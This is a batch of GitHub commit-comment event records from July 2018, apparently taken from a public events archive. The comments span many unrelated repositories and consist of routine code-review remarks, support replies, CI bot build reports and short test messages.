{"id":"7988949947","type":"CommitCommentEvent","actor":{"login":"Nowosad"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29764037,"position":null,"line":null,"path":null,"commit_id":"168320d97a0674cc22c04ce036b314d3cbaea2f9","created_at":"2018-07-19T12:51:02Z","updated_at":"2018-07-19T12:51:02Z","author_association":"COLLABORATOR","body":"Go for it;)"}},"created_at":"2018-07-19T12:51:02Z"}
{"id":"7988950467","type":"CommitCommentEvent","actor":{"login":"deveee"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29764039,"position":null,"line":null,"path":null,"commit_id":"16e53cbf4d8bccc8e4e7a83fc198f73e48340756","created_at":"2018-07-19T12:51:09Z","updated_at":"2018-07-19T12:51:09Z","author_association":"MEMBER","body":"Just to make it clear, I really don't like these icons :P\r\n\r\nAnd anyway, on android buttons for touch device may be quite big. For 1920x1200 and scale=1.5 it's 630px for steering wheel/up_down buttons and 225px for other buttons. So I think that it needs at least 512/256 images. "}},"created_at":"2018-07-19T12:51:09Z"}
{"id":"7988951275","type":"CommitCommentEvent","actor":{"login":"prusa3d-bb"},"repo":{"name":"prusa3d/Original-Prusa-i3"},"payload":{"comment":{"id":29764040,"position":null,"line":null,"path":null,"commit_id":"ad994c49ac9211c01122046ce410f98257c35ddf","created_at":"2018-07-19T12:51:17Z","updated_at":"2018-07-19T12:51:17Z","author_association":"NONE","body":"Hello,\nnew parts are already uploaded on our site, feel free to check the STL files - https://www.prusa3d.com/prusa-i3-printable-parts/\nKind regards\n\n\n—\nLukáš Vacek\nCustomer Support\n\n\nPRUSA Research\n+420 222 263 718\n+421 220 570 305\n188/7a Partyzánská, 17000, Prague\nshop.prusa3D.com\n\n\nFor simple troubleshooting, please use: http://help.prusa3d.com\n\n\nPlease rate our reply ...be generous :-)\n\n--- original message ---\nOn Wed, Jul 18, 2018 at 12:24 am, <notifications@github.com> MartinRWolfe wrote:\n\n\nCould you add the SCad files please so those of us that have fitted Volcano blocks will be able to modify the cooling update to suit.\n\nRegards,\n\nMartin\n\n—\n\nYou are receiving this because you are subscribed to this thread.\n\nReply to this email directly, view it on GitHub, or mute the thread.\n--- end of original message ---"}},"created_at":"2018-07-19T12:51:17Z"}
{"id":"7988952048","type":"CommitCommentEvent","actor":{"login":"fac30ff"},"repo":{"name":"podolsky4/TextMessenger"},"payload":{"comment":{"id":29764042,"position":null,"line":null,"path":null,"commit_id":"d1c920e45ea00a4ad7635e430f824b3a952a5cff","created_at":"2018-07-19T12:51:25Z","updated_at":"2018-07-19T12:51:25Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create interface UserRepository for model User](https://trello.com/c/SuyCyrLS/64-create-interface-userrepository-for-model-user)"}},"created_at":"2018-07-19T12:51:25Z"}
{"id":"7988952951","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29764046,"position":null,"line":null,"path":null,"commit_id":"9360eab88d32cd123ba187a0cd4307801e5ef79f","created_at":"2018-07-19T12:51:36Z","updated_at":"2018-07-19T12:51:36Z","author_association":"COLLABORATOR","body":"Possible cases: kendi, **kendiyi**, **kendiye**, kendiyle, kendinin, **kendiden**\r\nNot sure about the plurals, but I feel like this might need its own continuation class."}},"created_at":"2018-07-19T12:51:36Z"}
{"id":"7988956724","type":"CommitCommentEvent","actor":{"login":"FredrikAugust"},"repo":{"name":"nehbit/aether"},"payload":{"comment":{"id":29764054,"position":3,"line":43,"path":"Aether 2/backend/cmd/run.go","commit_id":"345f27f4a8acf7943299f531e5af9d21b612ed75","created_at":"2018-07-19T12:52:15Z","updated_at":"2018-07-19T12:52:15Z","author_association":"NONE","body":"Redundant comment."}},"created_at":"2018-07-19T12:52:15Z"}
{"id":"7988963129","type":"CommitCommentEvent","actor":{"login":"samueltardieu"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":29764065,"position":27,"line":401,"path":"main/src/cgeo/geocaching/connector/gc/GCWebAPI.java","commit_id":"041f8d22020abc475567ec72e6a60c9f5e83ff0e","created_at":"2018-07-19T12:53:26Z","updated_at":"2018-07-19T12:53:26Z","author_association":"MEMBER","body":"Matter of taste: `skip` could have been omitted there and replaced by `trackableInventoryEntries.size()` in the request."}},"created_at":"2018-07-19T12:53:26Z"}
{"id":"7988963631","type":"CommitCommentEvent","actor":{"login":"sahilsharma011"},"repo":{"name":"baopham/laravel-dynamodb"},"payload":{"comment":{"id":29764068,"position":113,"line":113,"path":"src/DynamoDb/QueryBuilder.php","commit_id":"51e323020b3dfe79359e6a413ab618475f8056c9","created_at":"2018-07-19T12:53:31Z","updated_at":"2018-07-19T12:53:31Z","author_association":"NONE","body":"This helper method is not present before Laravel 5.4  \r\nDue to this query builder functionality will not work for Laravel 5.1-5.3"}},"created_at":"2018-07-19T12:53:31Z"}
{"id":"7988964519","type":"CommitCommentEvent","actor":{"login":"tuxedo0801"},"repo":{"name":"rrd4j/rrd4j"},"payload":{"comment":{"id":29764072,"position":null,"line":null,"path":null,"commit_id":"604209f01552fe5a1d24d0245257301851f0d027","created_at":"2018-07-19T12:53:42Z","updated_at":"2018-07-19T12:53:42Z","author_association":"NONE","body":"What do you try to explain? https://github.com/rrd4j/rrd4j/commit/604209f01552fe5a1d24d0245257301851f0d027 is exactly this page where we discuss about your suuggested code-change, that only works with java9+, where where I suggested to use reflection to overcome this limitation + where I have posted an reflection-snippet that could solve this issue."}},"created_at":"2018-07-19T12:53:42Z"}
{"id":"7988966514","type":"CommitCommentEvent","actor":{"login":"Muhammadhab"},"repo":{"name":"Muhammadhab/Brunei-Kiub-Project"},"payload":{"comment":{"id":29764076,"position":3,"line":3,"path":"AboutBruneiKiub.html","commit_id":"5f1657bc1ff10d37def091fbc6c695e0a90076ad","created_at":"2018-07-19T12:54:04Z","updated_at":"2018-07-19T12:54:04Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-19T12:54:04Z"}
{"id":"7988977941","type":"CommitCommentEvent","actor":{"login":"fbacchella"},"repo":{"name":"rrd4j/rrd4j"},"payload":{"comment":{"id":29764096,"position":null,"line":null,"path":null,"commit_id":"604209f01552fe5a1d24d0245257301851f0d027","created_at":"2018-07-19T12:56:10Z","updated_at":"2018-07-19T12:56:10Z","author_association":"CONTRIBUTOR","body":"Sorry, wrong link: https://github.com/rrd4j/rrd4j/commit/416ddc39eebc2954cfaed2af8cfd4cc19290c3f8"}},"created_at":"2018-07-19T12:56:10Z"}
{"id":"7988983643","type":"CommitCommentEvent","actor":{"login":"ItzJustPammie"},"repo":{"name":"ItzJustPammie/Discord-Bot"},"payload":{"comment":{"id":29764109,"position":null,"line":null,"path":null,"commit_id":"6ce38ece75de6d6b0998c94d9a8d6a9fbb1b4376","created_at":"2018-07-19T12:57:12Z","updated_at":"2018-07-19T12:57:12Z","author_association":"OWNER","body":"Test commit\r\n"}},"created_at":"2018-07-19T12:57:12Z"}
{"id":"7988988977","type":"CommitCommentEvent","actor":{"login":"naseberry"},"repo":{"name":"naseberry/parliament.uk-pugin"},"payload":{"comment":{"id":29764124,"position":1,"line":1,"path":"node-version","commit_id":"17ff5388305fd46150b7cfc9bf58a4d5ab1d6b07","created_at":"2018-07-19T12:58:11Z","updated_at":"2018-07-19T12:58:11Z","author_association":"OWNER","body":"This was to test the heroku deployment issues I was having...\r\nPackage.json will install the latest version\r\n"}},"created_at":"2018-07-19T12:58:11Z"}
{"id":"7988991476","type":"CommitCommentEvent","actor":{"login":"djewst"},"repo":{"name":"mattfrear/Swashbuckle.Examples"},"payload":{"comment":{"id":29764126,"position":null,"line":null,"path":null,"commit_id":"ff8eba678c8e5b101fa450652f4e16890d69ae49","created_at":"2018-07-19T12:58:40Z","updated_at":"2018-07-19T12:58:40Z","author_association":"NONE","body":"Perfect! Thanks, happy user now."}},"created_at":"2018-07-19T12:58:40Z"}
{"id":"7988995775","type":"CommitCommentEvent","actor":{"login":"frenck"},"repo":{"name":"hassio-addons/addon-node-red"},"payload":{"comment":{"id":29764134,"position":null,"line":null,"path":null,"commit_id":"43c8adda9338f79f0e5829bc2a4d630b434855eb","created_at":"2018-07-19T12:59:28Z","updated_at":"2018-07-19T12:59:28Z","author_association":"MEMBER","body":"See the community forum for a detailed explanation of why and how you can still run the fork.\r\nSecondly, please do not use comments on commits. Thanks."}},"created_at":"2018-07-19T12:59:28Z"}
{"id":"7988997388","type":"CommitCommentEvent","actor":{"login":"ohoushyar"},"repo":{"name":"ohoushyar/dotfiles"},"payload":{"comment":{"id":29764136,"position":null,"line":null,"path":null,"commit_id":"4af68bc612fc2c0eb038f66fc4b58c5717f8ae2b","created_at":"2018-07-19T12:59:44Z","updated_at":"2018-07-19T12:59:44Z","author_association":"OWNER","body":"It's encrypted."}},"created_at":"2018-07-19T12:59:44Z"}
{"id":"7988999049","type":"CommitCommentEvent","actor":{"login":"diegopradogesto"},"repo":{"name":"Ultimaker/CuraDrivePlugin"},"payload":{"comment":{"id":29764138,"position":null,"line":null,"path":null,"commit_id":"25891778d9798d53a6b4e3ee92ec29ff9ea94eb0","created_at":"2018-07-19T13:00:01Z","updated_at":"2018-07-19T13:00:01Z","author_association":"NONE","body":"Now the tooltip text looks a bit ugly, probably due to not rounded values in size (see picture).\r\n\r\n![image](https://user-images.githubusercontent.com/15830521/42943875-5a154a80-8b64-11e8-873d-ccc8c5fa24dc.png)\r\n"}},"created_at":"2018-07-19T13:00:01Z"}
{"id":"7989003427","type":"CommitCommentEvent","actor":{"login":"ssw3r"},"repo":{"name":"ssw3r/pantheon-give-to-uva"},"payload":{"comment":{"id":29764156,"position":null,"line":null,"path":null,"commit_id":"7f86fcb2ac4fde7cae7acd0e44d6479e7f671355","created_at":"2018-07-19T13:00:46Z","updated_at":"2018-07-19T13:00:46Z","author_association":"OWNER","body":"Created multidev environment [pantheon-give-to-uva#ci-16](https://dashboard.pantheon.io/sites/b74c531d-f25b-4a5a-8aca-813c48288835#ci-16).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-16-pantheon-give-to-uva.pantheonsite.io/)"}},"created_at":"2018-07-19T13:00:46Z"}
{"id":"7989005737","type":"CommitCommentEvent","actor":{"login":"mtuncer"},"repo":{"name":"citusdata/citus"},"payload":{"comment":{"id":29764159,"position":45,"line":349,"path":"src/test/regress/expected/foreign_key_to_reference_table.out","commit_id":"481ef9fd66c5e6838eca629c6a651f4d003420c5","created_at":"2018-07-19T13:01:11Z","updated_at":"2018-07-19T13:01:11Z","author_association":"MEMBER","body":"do we support shard_replication_factor > 1 in Enterprise ?"}},"created_at":"2018-07-19T13:01:11Z"}
{"id":"7989010731","type":"CommitCommentEvent","actor":{"login":"ssw3r"},"repo":{"name":"ssw3r/pantheon-give-to-uva"},"payload":{"comment":{"id":29764170,"position":null,"line":null,"path":null,"commit_id":"c96433ebacf1a7eba6b3d27e68304cb435c844e6","created_at":"2018-07-19T13:02:04Z","updated_at":"2018-07-19T13:02:04Z","author_association":"OWNER","body":"Created multidev environment [pantheon-give-to-uva#ci-17](https://dashboard.pantheon.io/sites/b74c531d-f25b-4a5a-8aca-813c48288835#ci-17).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-17-pantheon-give-to-uva.pantheonsite.io/)"}},"created_at":"2018-07-19T13:02:04Z"}
{"id":"7989018834","type":"CommitCommentEvent","actor":{"login":"furkansahin"},"repo":{"name":"citusdata/citus"},"payload":{"comment":{"id":29764191,"position":45,"line":349,"path":"src/test/regress/expected/foreign_key_to_reference_table.out","commit_id":"481ef9fd66c5e6838eca629c6a651f4d003420c5","created_at":"2018-07-19T13:03:33Z","updated_at":"2018-07-19T13:03:33Z","author_association":"MEMBER","body":"No. But I discussed this with @onderkalaci if we should change the error message or not. Obviously, this message was created after a long time discussions with management, marketing teams involved, so we decided not to touch."}},"created_at":"2018-07-19T13:03:33Z"}
{"id":"7989019034","type":"CommitCommentEvent","actor":{"login":"chopperg"},"repo":{"name":"chopperg/furry-octo-robot"},"payload":{"comment":{"id":29764192,"position":null,"line":null,"path":null,"commit_id":"110aab67a78b8a4c48fcb79265be06390fb3b1cb","created_at":"2018-07-19T13:03:35Z","updated_at":"2018-07-19T13:03:35Z","author_association":"OWNER","body":"Donations "}},"created_at":"2018-07-19T13:03:35Z"}
{"id":"7989019369","type":"CommitCommentEvent","actor":{"login":"exchangkong"},"repo":{"name":"TTYMX/new_laravel"},"payload":{"comment":{"id":29764193,"position":52,"line":52,"path":"app/Http/Controllers/Home/LoginController.php","commit_id":"f8a40bdfa987704f4aae2cbb86d0dcdb6e798965","created_at":"2018-07-19T13:03:39Z","updated_at":"2018-07-19T13:03:39Z","author_association":"NONE","body":"不允许使用$_GET $_POST $_FILE 这种变量，获取参数可以使用$request->input('param'); 这种方式，详情参考手册"}},"created_at":"2018-07-19T13:03:39Z"}
{"id":"7989022765","type":"CommitCommentEvent","actor":{"login":"exchangkong"},"repo":{"name":"TTYMX/new_laravel"},"payload":{"comment":{"id":29764200,"position":64,"line":64,"path":"app/Http/Controllers/Home/LoginController.php","commit_id":"f8a40bdfa987704f4aae2cbb86d0dcdb6e798965","created_at":"2018-07-19T13:04:17Z","updated_at":"2018-07-19T13:04:17Z","author_association":"NONE","body":"$GLOBALS 这种变量不允许使用，有其它代替方法，具体可参考手册"}},"created_at":"2018-07-19T13:04:17Z"}
{"id":"7989023496","type":"CommitCommentEvent","actor":{"login":"swetha-ashok"},"repo":{"name":"madcyph3r/WhatsApi-Android-1"},"payload":{"comment":{"id":29764203,"position":null,"line":null,"path":null,"commit_id":"9908099be1a73257a76b2d4c07ddc755860b9e2e","created_at":"2018-07-19T13:04:24Z","updated_at":"2018-07-19T13:04:24Z","author_association":"NONE","body":"While registering i m getting status fails and reson for it is old_version"}},"created_at":"2018-07-19T13:04:24Z"}
{"id":"7989027372","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29764216,"position":12,"line":12,"path":"Lesson1/quadratic_equation.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T13:05:08Z","updated_at":"2018-07-19T13:05:08Z","author_association":"OWNER","body":"ясно с пробелами. у себя поменял таб на 2.\r\n\r\n19 июля 2018 г., 12:07 пользователь Vlad Filiucov <notifications@github.com>\r\nнаписал:\r\n\r\n>\r\n>    1. Договорились\r\n>    2. Сообщество руби отличается особым кол-вом конвенций и идеом,\r\n>    которые используются при написании кода. И любой style-guide начнется с\r\n>    использования 2 пробелов вместо табов\r\n>    https://github.com/rubocop-hq/ruby-style-guide\r\n>    3. Ну какие-то вещи рассказываются в скринкасте, какими-то мы делимся\r\n>    из собственного опыта\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/DmitriKudriashov/learning/commit/9cde866269fb0ed380c5e534e7cc48e6e7153318#commitcomment-29761319>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AaExIwwUXfVL9iCU5Y5yZw9ncRy4YU-0ks5uIExegaJpZM4VVeiE>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-19T13:05:08Z"}
{"id":"7989027892","type":"CommitCommentEvent","actor":{"login":"chopperg"},"repo":{"name":"chopperg/furry-octo-robot"},"payload":{"comment":{"id":29764221,"position":656,"line":656,"path":"LICENSE.md","commit_id":"110aab67a78b8a4c48fcb79265be06390fb3b1cb","created_at":"2018-07-19T13:05:13Z","updated_at":"2018-07-19T13:05:13Z","author_association":"OWNER","body":"Sharp developments Copyright (C) 2018 Greg Sharp"}},"created_at":"2018-07-19T13:05:13Z"}
{"id":"7989028723","type":"CommitCommentEvent","actor":{"login":"rhwood"},"repo":{"name":"rhwood/cockpit"},"payload":{"comment":{"id":29764226,"position":null,"line":null,"path":null,"commit_id":"f62db56696d3f43dd5eba6065a2f1d1c2030fd84","created_at":"2018-07-19T13:05:21Z","updated_at":"2018-07-19T13:05:21Z","author_association":"OWNER","body":"Closing to rework. Will open new PR when ready."}},"created_at":"2018-07-19T13:05:21Z"}
{"id":"7989032658","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29764233,"position":22,"line":22,"path":"Lesson1/right_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T13:06:02Z","updated_at":"2018-07-19T13:06:02Z","author_association":"OWNER","body":"да..ясно. изменил. сенк.\r\n\r\n2018-07-19 12:18 GMT+03:00 Vlad Filiucov <notifications@github.com>:\r\n\r\n> второй ответ в гугле по запросу \"sublime настроить автодобавление пустой\r\n> строки в конце файла\"\r\n> https://cifronomika.ru/blog/git-no-newline-at-end-of-file.html\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/DmitriKudriashov/learning/commit/9cde866269fb0ed380c5e534e7cc48e6e7153318#commitcomment-29761496>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AaExI6Vm3EWZ926CWWTyDTN2loPgtxalks5uIE7ugaJpZM4VVeiE>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-19T13:06:02Z"}
{"id":"7989033116","type":"CommitCommentEvent","actor":{"login":"exchangkong"},"repo":{"name":"TTYMX/new_laravel"},"payload":{"comment":{"id":29764235,"position":67,"line":67,"path":"app/Http/Controllers/Home/LoginController.php","commit_id":"f8a40bdfa987704f4aae2cbb86d0dcdb6e798965","created_at":"2018-07-19T13:06:08Z","updated_at":"2018-07-19T13:06:08Z","author_association":"NONE","body":"发送HTTP请求使用GuzzleHttp"}},"created_at":"2018-07-19T13:06:08Z"}
{"id":"7989038921","type":"CommitCommentEvent","actor":{"login":"ChrisTerBeke"},"repo":{"name":"Ultimaker/CuraDrivePlugin"},"payload":{"comment":{"id":29764251,"position":null,"line":null,"path":null,"commit_id":"25891778d9798d53a6b4e3ee92ec29ff9ea94eb0","created_at":"2018-07-19T13:07:06Z","updated_at":"2018-07-19T13:07:06Z","author_association":"MEMBER","body":"Weird, it's still an ActionToolTip, that didn't change..."}},"created_at":"2018-07-19T13:07:06Z"}
{"id":"7989046869","type":"CommitCommentEvent","actor":{"login":"jqdurham"},"repo":{"name":"Ortus-Solutions/TestBox"},"payload":{"comment":{"id":29764270,"position":null,"line":null,"path":null,"commit_id":"1d534ac053ec348d313745c8c39c02b99b3ce8bc","created_at":"2018-07-19T13:08:28Z","updated_at":"2018-07-19T13:08:28Z","author_association":"CONTRIBUTOR","body":"It seems like we should have a mechanism to flush this directory for CI environments.  If Testbox never manages this, we run the risk of filling up a disk."}},"created_at":"2018-07-19T13:08:28Z"}
{"id":"7989047561","type":"CommitCommentEvent","actor":{"login":"alexpvasile"},"repo":{"name":"alexpvasile/Hello-World"},"payload":{"comment":{"id":29764276,"position":null,"line":null,"path":null,"commit_id":"ad5fbc69115930d312a6bbd85e6f85761a9c8c42","created_at":"2018-07-19T13:08:36Z","updated_at":"2018-07-19T13:08:36Z","author_association":"OWNER","body":"Don' wanna fall asleep please!"}},"created_at":"2018-07-19T13:08:36Z"}
{"id":"7989052998","type":"CommitCommentEvent","actor":{"login":"89303992"},"repo":{"name":"89303992/hello-world"},"payload":{"comment":{"id":29764285,"position":null,"line":null,"path":null,"commit_id":"7c8ce1751b4f958770ba80abf10322aaea234bd5","created_at":"2018-07-19T13:09:38Z","updated_at":"2018-07-19T13:09:38Z","author_association":"OWNER","body":"uuuu"}},"created_at":"2018-07-19T13:09:38Z"}
{"id":"7989054655","type":"CommitCommentEvent","actor":{"login":"MrWils"},"repo":{"name":"DarkNightMode/Dark-Night-Mode-Chrome-Extension"},"payload":{"comment":{"id":29764287,"position":null,"line":null,"path":null,"commit_id":"2807a5f20a8fd5aa906a017e3bcbc212960816a8","created_at":"2018-07-19T13:09:54Z","updated_at":"2018-07-19T13:09:54Z","author_association":"NONE","body":"Are you still working on the new version?  \r\nI would like to help by removing the non-free javascript and replacing it with CSS on you website.   \r\n  \r\nHa, btw a lot of GPL and open source supporters moved to gitlab so you could think about moving the project to gitlab. You don't have to, it's just a suggestion."}},"created_at":"2018-07-19T13:09:54Z"}
{"id":"7989055770","type":"CommitCommentEvent","actor":{"login":"rcarauta"},"repo":{"name":"rcarauta/website"},"payload":{"comment":{"id":29764293,"position":null,"line":null,"path":null,"commit_id":"aa13c5082c35870aae2a1337b1b6569a25277801","created_at":"2018-07-19T13:10:07Z","updated_at":"2018-07-19T13:10:07Z","author_association":"OWNER","body":"Associatin with #3 "}},"created_at":"2018-07-19T13:10:07Z"}
{"id":"7989067520","type":"CommitCommentEvent","actor":{"login":"chopperg"},"repo":{"name":"chopperg/fantastic-octo-goggles"},"payload":{"comment":{"id":29764313,"position":null,"line":null,"path":null,"commit_id":"52653073b0ad2581e8b476762517d0c32a79f880","created_at":"2018-07-19T13:12:12Z","updated_at":"2018-07-19T13:12:12Z","author_association":"OWNER","body":"Sharp Copyright(C)2016 Gregory Sharp"}},"created_at":"2018-07-19T13:12:12Z"}
{"id":"7989071609","type":"CommitCommentEvent","actor":{"login":"VRamakrishna"},"repo":{"name":"HyperledgerHandsOn/trade-finance-logistics"},"payload":{"comment":{"id":29764324,"position":null,"line":null,"path":null,"commit_id":"284ea59fb74774d1e257be943747784c7421f102","created_at":"2018-07-19T13:12:57Z","updated_at":"2018-07-19T13:12:57Z","author_association":"COLLABORATOR","body":"@ldesrosi What was this change for? Can we revert it?"}},"created_at":"2018-07-19T13:12:57Z"}
{"id":"7989074066","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29764332,"position":null,"line":null,"path":null,"commit_id":"211f6d675eb46d0db995370046ac66c541a48378","created_at":"2018-07-19T13:13:24Z","updated_at":"2018-07-19T13:13:24Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-19T13:13:24Z"}
{"id":"7989085310","type":"CommitCommentEvent","actor":{"login":"jasontedor"},"repo":{"name":"tvernum/elasticsearch"},"payload":{"comment":{"id":29764353,"position":28,"line":315,"path":"x-pack/plugin/core/src/main/java/org/elasticsearch/license/LicenseService.java","commit_id":"5b0424c8ff5592c9832146ab866ae455d592a6d6","created_at":"2018-07-19T13:15:24Z","updated_at":"2018-07-19T13:15:24Z","author_association":"NONE","body":"Nit: `getLicenseMetaData` -> `getLicensesMetaData` (note the `s`)"}},"created_at":"2018-07-19T13:15:24Z"}
{"id":"7989086976","type":"CommitCommentEvent","actor":{"login":"BrancoSmith"},"repo":{"name":"tiagocmds/bar_laravel"},"payload":{"comment":{"id":29764356,"position":null,"line":null,"path":null,"commit_id":"ee1221e51d333aa0d3df1a1fa83e37b89f1f26a6","created_at":"2018-07-19T13:15:41Z","updated_at":"2018-07-19T13:15:41Z","author_association":"NONE","body":"Ta muito fudido mesmo "}},"created_at":"2018-07-19T13:15:41Z"}
{"id":"7989090319","type":"CommitCommentEvent","actor":{"login":"christoff-buerger"},"repo":{"name":"christoff-buerger/Modelica_Synchronous"},"payload":{"comment":{"id":29764360,"position":null,"line":null,"path":null,"commit_id":"08f974a7331954747bf757f8230bbb522bfb7700","created_at":"2018-07-19T13:16:17Z","updated_at":"2018-07-19T13:16:17Z","author_association":"OWNER","body":"Typo: this is a fix for issue #32, not #30."}},"created_at":"2018-07-19T13:16:17Z"}
{"id":"7989091608","type":"CommitCommentEvent","actor":{"login":"yambs4"},"repo":{"name":"jlegewie/SublimePeek"},"payload":{"comment":{"id":29764362,"position":null,"line":null,"path":null,"commit_id":"66c726d8887f488c57f1dcc6687954594204d7ed","created_at":"2018-07-19T13:16:31Z","updated_at":"2018-07-19T13:16:31Z","author_association":"NONE","body":"Hi, \r\nI am working with Stata 14 on Windows 10. I am learning to use ST3 (in stead of the built in do file editor) for executing Stata command. How can I make ublimePeek to work for me?\r\n\r\nHelp is much appreciated!\r\nYonatan"}},"created_at":"2018-07-19T13:16:31Z"}
{"id":"7989101958","type":"CommitCommentEvent","actor":{"login":"midal2"},"repo":{"name":"midal2/biz_trip"},"payload":{"comment":{"id":29764375,"position":null,"line":null,"path":null,"commit_id":"70a9e2321bd95e14045703e916f0773df3dc6797","created_at":"2018-07-19T13:18:19Z","updated_at":"2018-07-19T13:18:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [ark#07.15 Mission For android studio](https://trello.com/c/WwXiSrbm/23-ark0715-mission-for-android-studio)"}},"created_at":"2018-07-19T13:18:19Z"}
{"id":"7989106532","type":"CommitCommentEvent","actor":{"login":"Alex-CD"},"repo":{"name":"Alex-CD/Civ5-Extended"},"payload":{"comment":{"id":29764385,"position":null,"line":null,"path":null,"commit_id":"6d45c2ee31adc60793d08b5aa34e814c31f4f257","created_at":"2018-07-19T13:19:09Z","updated_at":"2018-07-19T13:19:09Z","author_association":"OWNER","body":"You didn't think I'd actually added my actual secret keys to the repo, right?"}},"created_at":"2018-07-19T13:19:09Z"}
{"id":"7989107726","type":"CommitCommentEvent","actor":{"login":"lharzenetter"},"repo":{"name":"OpenTOSCA/winery"},"payload":{"comment":{"id":29764392,"position":12,"line":30,"path":"org.eclipse.winery.repository.ui/src/app/instance/sharedComponents/properties/properties.service.ts","commit_id":"f2fbee343a11ce913a002bed057e9453a2da9885","created_at":"2018-07-19T13:19:21Z","updated_at":"2018-07-19T13:19:21Z","author_association":"MEMBER","body":"![grafik](https://user-images.githubusercontent.com/23058331/42944873-1b578864-8b67-11e8-9142-3b381d819425.png)\r\n"}},"created_at":"2018-07-19T13:19:21Z"}
{"id":"7989120012","type":"CommitCommentEvent","actor":{"login":"enggmind"},"repo":{"name":"rudreshrm05/env-py"},"payload":{"comment":{"id":29764423,"position":96,"line":96,"path":"cards.py","commit_id":"2355594b5579976ef042dcda8320fe1be8671a59","created_at":"2018-07-19T13:21:25Z","updated_at":"2018-07-19T13:21:25Z","author_association":"NONE","body":"a) spacing is wrong \r\nb) and pos=pos ideally should be data instead of params"}},"created_at":"2018-07-19T13:21:25Z"}
{"id":"7989120282","type":"CommitCommentEvent","actor":{"login":"jasontedor"},"repo":{"name":"tvernum/elasticsearch"},"payload":{"comment":{"id":29764424,"position":17,"line":271,"path":"x-pack/plugin/core/src/main/java/org/elasticsearch/license/XPackLicenseState.java","commit_id":"5b0424c8ff5592c9832146ab866ae455d592a6d6","created_at":"2018-07-19T13:21:28Z","updated_at":"2018-07-19T13:21:28Z","author_association":"NONE","body":"I would rather that we separate this to `isSecurityExplicitlyEnabled` with its current meaning and `isSecurityEnabledByTrialVersion` that captures the < 6.3 / >= 6.3 logic."}},"created_at":"2018-07-19T13:21:28Z"}
{"id":"7989120440","type":"CommitCommentEvent","actor":{"login":"anandakumarb"},"repo":{"name":"systemd/systemd"},"payload":{"comment":{"id":29764425,"position":null,"line":null,"path":null,"commit_id":"7c30c3c44f84421bbe510fb3339378e075b3ab48","created_at":"2018-07-19T13:21:29Z","updated_at":"2018-07-19T13:21:29Z","author_association":"NONE","body":"Hi keszybz,\r\n\r\nI would like to confirm whether this commit 7c30c3c,  fixes the below scenario:\r\n- When user updates the timestamp in \"SYSLOG_TIMESTAMP\" and send it to journald as shown below, \r\n        sd_journal_send(\"MESSAGE= Hello World, this is PID123 %lu!\",\r\n                                                (unsigned long) getpid(),\r\n                                                \"SYSLOG_TIMESTAMP=Jul 19 15:07:58\",\r\n                                                \"PRIORITY=%i\", LOG_INFO,\r\n                                                NULL);\r\n - Query: In the above scenario, whether journald uses the timestamp which is passed in \"SYSLOG_TIMESTAMP\" field or it updates the timestamp when journald receives the message.?\r\n\r\nPlease correct my understanding.\r\n\r\nThanks & Regards,\r\nAnanda\r\n\r\n"}},"created_at":"2018-07-19T13:21:29Z"}
{"id":"7989121275","type":"CommitCommentEvent","actor":{"login":"Arlenelalala"},"repo":{"name":"luckyqsz/BCRC-ASAGroup"},"payload":{"comment":{"id":29764427,"position":null,"line":null,"path":null,"commit_id":"87b45227c15e2430bbc39ff646289dd8436c8e64","created_at":"2018-07-19T13:21:38Z","updated_at":"2018-07-19T13:21:38Z","author_association":"COLLABORATOR","body":"组会报告"}},"created_at":"2018-07-19T13:21:38Z"}
